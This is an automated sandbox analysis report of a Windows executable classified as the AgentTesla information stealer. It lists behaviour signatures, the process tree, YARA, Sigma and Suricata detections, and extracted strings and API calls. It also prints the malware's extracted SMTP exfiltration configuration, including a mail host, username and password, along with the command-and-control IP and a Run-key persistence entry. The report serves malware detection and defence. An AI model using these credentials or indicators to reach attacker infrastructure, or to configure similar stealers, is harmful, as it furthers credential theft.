Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SOA_9828392091.exe

Overview

General Information

Sample name:SOA_9828392091.exe
Analysis ID:1562878
MD5:180595851681bf165b09671519906dd1
SHA1:2ddf0c1fd34ce5d9de9de60c39ce4b0b4ba7cac8
SHA256:cc1e3f414454270d801d9dc8251ad2fc700476fdcce48da792fd48ff391f22e7
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SOA_9828392091.exe (PID: 7152 cmdline: "C:\Users\user\Desktop\SOA_9828392091.exe" MD5: 180595851681BF165B09671519906DD1)
    • RegSvcs.exe (PID: 968 cmdline: "C:\Users\user\Desktop\SOA_9828392091.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • yGbzOMp.exe (PID: 7104 cmdline: "C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • yGbzOMp.exe (PID: 4904 cmdline: "C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.palumalimited.com", "Username": "novlove@palumalimited.com", "Password": "85h!UAfvL2AE"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
    00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x31d5f:$a13: get_DnsResolver
      • 0x30458:$a20: get_LastAccessed
      • 0x3278d:$a27: set_InternalServerPort
      • 0x32ac2:$a30: set_GuidMasterKey
      • 0x3056a:$a33: get_Clipboard
      • 0x30578:$a34: get_Keyboard
      • 0x31959:$a35: get_ShiftKeyDown
      • 0x3196a:$a36: get_AltKeyDown
      • 0x30585:$a37: get_Password
      • 0x310b4:$a38: get_PasswordHash
      • 0x321c1:$a39: get_DefaultCredentials
      00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Click to see the 8 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.SOA_9828392091.exe.22c0000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            0.2.SOA_9828392091.exe.22c0000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.SOA_9828392091.exe.22c0000.1.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x3015f:$a13: get_DnsResolver
              • 0x2e858:$a20: get_LastAccessed
              • 0x30b8d:$a27: set_InternalServerPort
              • 0x30ec2:$a30: set_GuidMasterKey
              • 0x2e96a:$a33: get_Clipboard
              • 0x2e978:$a34: get_Keyboard
              • 0x2fd59:$a35: get_ShiftKeyDown
              • 0x2fd6a:$a36: get_AltKeyDown
              • 0x2e985:$a37: get_Password
              • 0x2f4b4:$a38: get_PasswordHash
              • 0x305c1:$a39: get_DefaultCredentials
              0.2.SOA_9828392091.exe.22c0000.1.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x32c9d:$s10: logins
              • 0x32717:$s11: credential
              • 0x2e96a:$g1: get_Clipboard
              • 0x2e978:$g2: get_Keyboard
              • 0x2e985:$g3: get_Password
              • 0x2fd49:$g4: get_CtrlKeyDown
              • 0x2fd59:$g5: get_ShiftKeyDown
              • 0x2fd6a:$g6: get_AltKeyDown
              0.2.SOA_9828392091.exe.22c0000.1.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                Click to see the 7 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 968, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yGbzOMp
                Sigma detected: Suspicious Outbound SMTP Connections
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 174.136.29.110, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 968, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49699

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-26T08:22:11.519362+010020301711A Network Trojan was detected192.168.2.649699174.136.29.110587TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-26T08:22:11.519362+010028397231Malware Command and Control Activity Detected192.168.2.649699174.136.29.110587TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.palumalimited.com", "Username": "novlove@palumalimited.com", "Password": "85h!UAfvL2AE"}
                Multi AV Scanner detection for domain / URL
                Source: mail.palumalimited.comVirustotal: Detection: 5%Perma Link
                Multi AV Scanner detection for submitted file
                Source: SOA_9828392091.exeReversingLabs: Detection: 39%
                Source: SOA_9828392091.exeVirustotal: Detection: 28%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: SOA_9828392091.exeJoe Sandbox ML: detected
                Source: SOA_9828392091.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: RegSvcs.pdb, source: yGbzOMp.exe, 00000004.00000000.2274410733.0000000000662000.00000002.00000001.01000000.00000006.sdmp, yGbzOMp.exe.2.dr
                Source: Binary string: wntdll.pdbUGP source: SOA_9828392091.exe, 00000000.00000003.2121849004.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, SOA_9828392091.exe, 00000000.00000003.2123023046.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SOA_9828392091.exe, 00000000.00000003.2121849004.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, SOA_9828392091.exe, 00000000.00000003.2123023046.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: yGbzOMp.exe, 00000004.00000000.2274410733.0000000000662000.00000002.00000001.01000000.00000006.sdmp, yGbzOMp.exe.2.dr
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00976CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00976CA9
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009760DD
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009763F9
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0097EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0097EB60
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0097F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0097F5FA
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0097F56F FindFirstFileW,FindClose,0_2_0097F56F
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00981B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00981B2F
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00981C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00981C8A
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00981F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00981F94

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.6:49699 -> 174.136.29.110:587
                Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.6:49699 -> 174.136.29.110:587
                Source: global trafficTCP traffic: 192.168.2.6:49699 -> 174.136.29.110:587
                Source: Joe Sandbox ViewIP Address: 174.136.29.110 174.136.29.110
                Source: Joe Sandbox ViewASN Name: IHNETUS IHNETUS
                Source: global trafficTCP traffic: 192.168.2.6:49699 -> 174.136.29.110:587
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00984EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00984EB5
                Source: global trafficDNS traffic detected: DNS query: mail.palumalimited.com
                Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dEIFpD.com
                Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002F7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.palumalimited.com
                Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002F7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://palumalimited.com
                Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wixxOvts0RfcEfM.org
                Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00986B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00986B0C
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00986D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00986D07
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00986B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00986B0C
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00972B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00972B37
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0099F7FF

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.SOA_9828392091.exe.22c0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.SOA_9828392091.exe.22c0000.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: Process Memory Space: SOA_9828392091.exe PID: 7152, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 968, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: This is a third-party compiled AutoIt script.0_2_00933D19
                Source: SOA_9828392091.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: SOA_9828392091.exe, 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_18fe0b95-3
                Source: SOA_9828392091.exe, 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3a1071ba-0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00933742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00933742
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009A00AF NtdllDialogWndProc_W,0_2_009A00AF
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009A0133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,0_2_009A0133
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009A044C NtdllDialogWndProc_W,0_2_009A044C
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099E9AF NtdllDialogWndProc_W,CallWindowProcW,0_2_0099E9AF
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0094AAFC NtdllDialogWndProc_W,0_2_0094AAFC
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0094AB4F NtdllDialogWndProc_W,0_2_0094AB4F
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099ECD4 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_0099ECD4
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099EC7C NtdllDialogWndProc_W,0_2_0099EC7C
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_0099EEEB
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_0099F1D7
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0094B11F NtdllDialogWndProc_W,74A3C8D0,NtdllDialogWndProc_W,0_2_0094B11F
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099F2D0 SendMessageW,NtdllDialogWndProc_W,0_2_0099F2D0
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0094B385 GetParent,NtdllDialogWndProc_W,0_2_0094B385
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_0099F351
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099F5AB NtdllDialogWndProc_W,0_2_0099F5AB
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099F5DA NtdllDialogWndProc_W,0_2_0099F5DA
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0094B55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_0094B55D
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099F689 ClientToScreen,NtdllDialogWndProc_W,0_2_0099F689
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099F609 NtdllDialogWndProc_W,0_2_0099F609
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099F654 NtdllDialogWndProc_W,0_2_0099F654
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099F7C3 GetWindowLongW,NtdllDialogWndProc_W,0_2_0099F7C3
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0099F7FF
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0094B715 NtdllDialogWndProc_W,0_2_0094B715
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00976685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00976685
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0096ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74F75590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_0096ACC5
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009779D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009779D3
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0095B0430_2_0095B043
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009432000_2_00943200
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0096410F0_2_0096410F
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009502A40_2_009502A4
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0096038E0_2_0096038E
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0093E3B00_2_0093E3B0
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009506D90_2_009506D9
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0096467F0_2_0096467F
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099AACE0_2_0099AACE
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00964BEF0_2_00964BEF
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0095CCC10_2_0095CCC1
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00936F070_2_00936F07
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0093AF500_2_0093AF50
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009931BC0_2_009931BC
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0095D1B90_2_0095D1B9
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0094B11F0_2_0094B11F
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0095123A0_2_0095123A
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0096724D0_2_0096724D
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009713CA0_2_009713CA
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009393F00_2_009393F0
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0094F5630_2_0094F563
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009396C00_2_009396C0
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0097B6CC0_2_0097B6CC
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009377B00_2_009377B0
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0099F7FF0_2_0099F7FF
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009679C90_2_009679C9
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0094FA570_2_0094FA57
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00943B700_2_00943B70
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00939B600_2_00939B60
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00937D190_2_00937D19
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00959ED00_2_00959ED0
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0094FE6F0_2_0094FE6F
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00937FA30_2_00937FA3
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_018BAA980_2_018BAA98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00F0A9A82_2_00F0A9A8
